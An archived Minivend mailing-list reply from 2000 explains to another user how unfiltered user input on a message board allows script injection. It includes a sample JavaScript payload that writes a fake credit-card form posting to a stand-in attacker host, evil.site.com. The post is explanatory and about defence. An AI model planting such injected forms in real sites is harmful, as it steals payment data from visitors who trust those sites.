[Date Prev][Date Next][Thread Prev][Thread Next][Minivend by date ][Minivend by thread ]

Re: [mv] RE: ..about time

To: minivend-users@minivend.com
Subject: Re: [mv] RE: ..about time
From: "kyle@invisio.com" <kyle@invisio.com>
Date: Thu, 03 Feb 2000 15:43:35 -0500
In-Reply-To: <001b01bf6e82$4f6b5020$92229018@nick>
References: <374BE08544FFD211A57D00A0C98F18631E9C5A@SERVER2><20000203114914.A21456@bill.minivend.com>
Reply-To: minivend-users@minivend.com
Sender: owner-minivend-users@minivend.com

******    message to minivend-users from "kyle@invisio.com" <kyle@invisio.com>     ******

It is not really about doing something malicious to a visitors
computer (like a virus) , it is more like this:

a web site takes form info from a visitor and displays it on a web
page for others to see (like a message bord) and someone enters
the code below in the text box:

<script language="JavaScript">
<!--
 document.write('<form action="https://evil.site.com/cgi/ripoff.pl";
method="post">');
 document.write('To purchase, please enter your credit card number
below.<br>');
 document.write('<input type="TEXT" name="cc" value="">');
 document.write('<input type="SUBMIT" name="SUBMIT" value="SUBMIT">');
 document.write('</form>');
// -->
</script>

Obviously they could dress it up and make it look like an official form on
that site if that site did not filter for such content

Then someone stumbles on this form on a site they trust and what do you know,
but evil.site.com now has their cc number.

This is just one example, just think of the possibilites!

Kyle (KC)


At 02:07 PM 2/3/00 -0600, you wrote:
>******    message to minivend-users from "Nick Pleis" <npleis@cei.net>     
>******
>
>I'm a bit confused...How malicious can you really be with Javascript?
>
>I mean...sure you can change the appereance and what  not, but can you do
>any serious <<damage>> or is this more of a threat to just presentation?
>
>
>>
>> I am certainly not advocating closing down the web; that would make me
>> have to go back and work for a living. 8-)
>>
>> --
>> Mike Heins                          http://www.minivend.com/  ___
>>                                     Internet Robotics        |_ _|____
>> In character, in manners, in        131 Willow Lane, Floor 2  | ||  _ \
>> style, in all things, the           Oxford, OH  45056         | || |_) |
>> supreme excellence is               <mikeh@minivend.com>     |___|  _ <
>> simplicity. -- Longfellow           513.523.7621 FAX 7501        |_| \_\
>> -
>> To unsubscribe from the list, DO NOT REPLY to this message.  Instead, send
>> email with 'UNSUBSCRIBE minivend-users' in the body to
>Majordomo@minivend.com.
>> Archive of past messages: http://www.minivend.com/minivend/minivend-list
>>
>
>-
>To unsubscribe from the list, DO NOT REPLY to this message.  Instead, send
>email with 'UNSUBSCRIBE minivend-users' in the body to Majordomo@minivend.com.
>Archive of past messages: http://www.minivend.com/minivend/minivend-list

-
To unsubscribe from the list, DO NOT REPLY to this message.  Instead, send
email with 'UNSUBSCRIBE minivend-users' in the body to Majordomo@minivend.com.
Archive of past messages: http://www.minivend.com/minivend/minivend-list

Follow-Ups:
- Re: [mv] RE: ..about time
  - From: Barry Treahy <treahy@mmaz.com>

References:
- [mv] RE: ..about time
  - From: Scott Satterthwaite <ssattert@homier.com>
- Re: [mv] RE: ..about time
  - From: Mike Heins <mike@minivend.com>
- Re: [mv] RE: ..about time
  - From: "Nick Pleis" <npleis@cei.net>

Prev by Date: Re: [mv] RE: ..about time
Next by Date: [mv] RE: its about time, AND IRC channel
Prev by thread: Re: [mv] RE: ..about time
Next by thread: Re: [mv] RE: ..about time
Index(es):
- Date
- Thread